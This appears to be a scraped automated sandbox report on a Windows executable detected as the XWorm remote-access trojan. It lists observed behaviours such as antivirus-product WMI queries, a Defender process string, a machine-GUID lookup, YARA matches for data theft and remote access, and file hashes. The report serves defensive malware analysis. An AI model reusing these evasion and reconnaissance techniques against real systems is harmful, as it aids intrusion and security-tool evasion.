Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Code function: 4_2_00007FF7EDCFB8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00007FF7EDCFB8DC

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Code function: 4_2_00007FFDA3845EC0 GetUserNameW,GetLastError,GetUserNameW,_invalid_parameter_noinfo_noreturn,

4_2_00007FFDA3845EC0

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2466557767.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2599478044.0000021451486000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: motor1.exe PID: 3424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 1220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: motor1.exe PID: 2120, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2466557767.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2599478044.0000021451486000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: motor1.exe PID: 3424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 1220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: motor1.exe PID: 2120, type: MEMORYSTR

Windows Analysis Report
pKxhpP0spW.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

ID:	1614136
Product:	CloudBasic
Start time:	11:15:40
Start date:	13.02.2025
Sample:	pKxhpP0spW.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	5b5fdbda39a6b76cb6f58bd3e7c94a0d
SHA1:	c95e0db60f54b3940ce26f88e6576b2cb27a7ab4
SHA256:	2047251822df06e77eba8c59f695d0b31c0b79199f37cf496f04d6955f5acc50
Filetype:	Win64 Executable Console (202006/5) 92.65%

Windows Analysis Report pKxhpP0spW.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Windows Analysis Report
pKxhpP0spW.exe

Malware Threat Intel
Provided by